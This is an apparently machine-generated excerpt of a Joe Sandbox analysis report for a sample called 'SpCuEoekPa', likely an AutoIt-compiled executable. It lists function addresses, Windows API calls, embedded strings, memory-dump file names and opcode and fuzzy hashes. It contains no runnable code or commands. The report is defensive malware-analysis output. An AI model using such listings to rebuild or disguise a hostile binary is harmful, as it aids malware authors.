                                                            • __gmtime64_s.LIBCMT ref: 00386F2A
                                                            • __allrem.LIBCMT ref: 00386F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386F9C
                                                            • __allrem.LIBCMT ref: 00386FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386FD1
                                                            • __allrem.LIBCMT ref: 00386FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00387006
                                                            • __invoke_watson.LIBCMT ref: 00387077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: 0e2aa96672b93929e9d3ad3ad2af52e460d1ddd8028a3ae429bc9c0867a51d97
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: E17118B6A00717ABDB16FF78DC42B5AB3A9AF04324F154269F514DB681E770ED408790
                                                            Function 003C2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2542
                                                            • GetMenuItemInfoW.USER32(00425890,000000FF,00000000,00000030), ref: 003C25A3
                                                            • SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C25D9
                                                            • Sleep.KERNEL32(000001F4), ref: 003C25EB
                                                            • GetMenuItemCount.USER32(?), ref: 003C262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 003C264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 003C2675
                                                            • GetMenuItemID.USER32(?,?), ref: 003C26BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C2700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
                                                            • Instruction ID: c92ebf092420adf6e46d6028ca54f78b7e99af665ee9335c4922232fa9e0b23b
                                                            • Opcode Fuzzy Hash: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
                                                            • Instruction Fuzzy Hash: 8D617A74900249EFDB22DF64CC88EAFBBB8EB46304F15056DE842E7291D771AD15DB21
                                                            Function 003E6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E6FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E6FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003E6FCC
                                                            • _memset.LIBCMT ref: 003E6FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E6FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E7067
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
                                                            • Instruction ID: c44a6c44a9602b4559878fe6204464e5f0a16679e6fd5e7c12b6920680024a46
                                                            • Opcode Fuzzy Hash: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
                                                            • Instruction Fuzzy Hash: 47616C75A00258AFDB12DFA5DC81EEE77B8EB09710F104269FA14EB2E1C771AD41DB50
                                                            Function 003B6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003B6BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 003B6C18
                                                            • VariantInit.OLEAUT32(?), ref: 003B6C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 003B6C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 003B6C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 003B6CB1
                                                            • VariantClear.OLEAUT32(?), ref: 003B6CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 003B6CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CDC
                                                            • VariantClear.OLEAUT32(?), ref: 003B6CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
                                                            • Instruction ID: 455aaadac2c57ab99dec0f220e1807d5859aaa1e8b9348c871cb255e6d3ebedf
                                                            • Opcode Fuzzy Hash: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
                                                            • Instruction Fuzzy Hash: 3B4172319001199FCF12DFA5D885DEEBBBDEF08304F008169E955AB2A1CB74A945CF90
                                                            Function 003D5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 003D5793
                                                            • inet_addr.WSOCK32(?,?,?), ref: 003D57D8
                                                            • gethostbyname.WSOCK32(?), ref: 003D57E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 003D57F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003D58ED
                                                            • WSACleanup.WSOCK32 ref: 003D58F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 11769f82a170f0ec8194b8fbf26f7093ab1c1a090d8750dadbb13f117f21e062
                                                            • Instruction ID: f68f8e112e60e7582b3bd21dc39567e5dcf89704a69177f93e63ec3fd6923cb3
                                                            • Opcode Fuzzy Hash: 11769f82a170f0ec8194b8fbf26f7093ab1c1a090d8750dadbb13f117f21e062
                                                            • Instruction Fuzzy Hash: 7B5160726047009FDB229F24EC85B6A7BE8EF48710F15852AF956DB3E1DB70E904DB41
                                                            Function 003CB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CB4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003CB546
                                                            • GetLastError.KERNEL32 ref: 003CB550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 003CB5BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
                                                            • Instruction ID: 4fd1f8ede322d6ec35c4ea8b2e5d407735ca3b636d81c6563b8658d8f6b4b617
                                                            • Opcode Fuzzy Hash: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
                                                            • Instruction Fuzzy Hash: 5831A235A40209DFCB12EB68C886FADB7B8EF46310F10812EF505DB291DB719E46CB40
                                                            Function 003B8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003B9014
                                                            • GetDlgCtrlID.USER32 ref: 003B901F
                                                            • GetParent.USER32 ref: 003B903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 003B903E
                                                            • GetDlgCtrlID.USER32(?), ref: 003B9047
                                                            • GetParent.USER32(?), ref: 003B9063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 003B9066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
                                                            • Instruction ID: 66097b0db8f9d8894c910e9bed2750b433406b42a2e6d11080a7b60838521c67
                                                            • Opcode Fuzzy Hash: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
                                                            • Instruction Fuzzy Hash: 0721F870A00148BFDF16ABA0CC85EFEBB78EF45310F10421AFA619B2E1DB795815DB20
                                                            Function 003B907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003B90FD
                                                            • GetDlgCtrlID.USER32 ref: 003B9108
                                                            • GetParent.USER32 ref: 003B9124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 003B9127
                                                            • GetDlgCtrlID.USER32(?), ref: 003B9130
                                                            • GetParent.USER32(?), ref: 003B914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 003B914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
                                                            • Instruction ID: c0ef677df9af5fdfb6554325ae050663006b3d435c3d241aa61bc28442032cbb
                                                            • Opcode Fuzzy Hash: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
                                                            • Instruction Fuzzy Hash: AF21C575A00148BFDF12ABA4CC85FFEBBB8EF44300F104116BA519B2A6DB759955DB20
                                                            Function 003B9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 003B916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 003B9184
                                                            • _wcscmp.LIBCMT ref: 003B9196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003B9211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
                                                            • Instruction ID: 0cf7add47df7fa43250434b98afe61c40f08e17ccd4e354f05c41443cec0abc4
                                                            • Opcode Fuzzy Hash: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
                                                            • Instruction Fuzzy Hash: CE110D7A6883077AFA133624DC06FE7379C9B15764B300457FB00AC8D1EE6169515658
                                                            Function 003C7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003C7A6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            • Opcode ID: 8f1168a4bcbd2eb4544ac780c37764c5609a822fa9d033407834b4b6e04985e4
                                                            • Instruction ID: 8a919983f27f6f705bfc2aef712300a89c12f3ac29e293452b5515f8e0e72796
                                                            • Opcode Fuzzy Hash: 8f1168a4bcbd2eb4544ac780c37764c5609a822fa9d033407834b4b6e04985e4
                                                            • Instruction Fuzzy Hash: 26B17B7190420A9FDB12DFA5C885FBEB7B8EF09321F218469E901EB291D774AD41CF90
                                                            Function 003C11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 003C11F0
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C1204
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 003C120B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C121A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 003C122C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1245
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1257
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C129C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12B1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
                                                            • Instruction ID: 54a2c79dd0e5dd300c4e984aa774cfef33a299f9bb0c04edd65e69cdb90ae413
                                                            • Opcode Fuzzy Hash: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
                                                            • Instruction Fuzzy Hash: 7E31D279600208FFDF329F54ED88F6A37ADEB56311F138629FA01CA1A1DBB49D409B54
                                                            Function 0036FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0036FAA6
                                                            • OleUninitialize.OLE32(?,00000000), ref: 0036FB45
                                                            • UnregisterHotKey.USER32(?), ref: 0036FC9C
                                                            • DestroyWindow.USER32(?), ref: 003A45D6
                                                            • FreeLibrary.KERNEL32(?), ref: 003A463B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003A4668
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
                                                            • Instruction ID: f9151d903fa88e7a1682ca0294e1c797bbb18a0a783b0532f3acbd0704c09a86
                                                            • Opcode Fuzzy Hash: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
                                                            • Instruction Fuzzy Hash: 95A15831701212CFCB2AEF14D995A69F7A4FF56700F1582ADE80AAB265CB70AD16CF50
                                                            Function 003D9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,?$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-1974717164
                                                            • Opcode ID: cea49a2c001d6a676030bc83845cc72ad8863ea430abeb67c3a4449abdb74f9a
                                                            • Instruction ID: 9a7209d5ab0b6927d4aeac4aa2599f82439873f2efc1e81d544ffe3786caaafd
                                                            • Opcode Fuzzy Hash: cea49a2c001d6a676030bc83845cc72ad8863ea430abeb67c3a4449abdb74f9a
                                                            • Instruction Fuzzy Hash: 2791AE72A00209ABDF26DFA5DC48FAEBBB8EF45710F10855BF515AB280D7709945CFA0
                                                            Function 003BA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,003BA439), ref: 003BA377
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
                                                            • Instruction ID: b2f44d562d12013f37647763c16515b41dc8d511752d04a60322e2c0f03abed0
                                                            • Opcode Fuzzy Hash: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
                                                            • Instruction Fuzzy Hash: 7F91D830A00E05ABDB4AEFA4C482BEDFBB4FF04308F54C519D959AB641DF316999CB91
                                                            Function 00362E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00362EAE
                                                              • Part of subcall function 00361DB3: GetClientRect.USER32(?,?), ref: 00361DDC
                                                              • Part of subcall function 00361DB3: GetWindowRect.USER32(?,?), ref: 00361E1D
                                                              • Part of subcall function 00361DB3: ScreenToClient.USER32(?,?), ref: 00361E45
                                                            • GetDC.USER32 ref: 0039CD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0039CD45
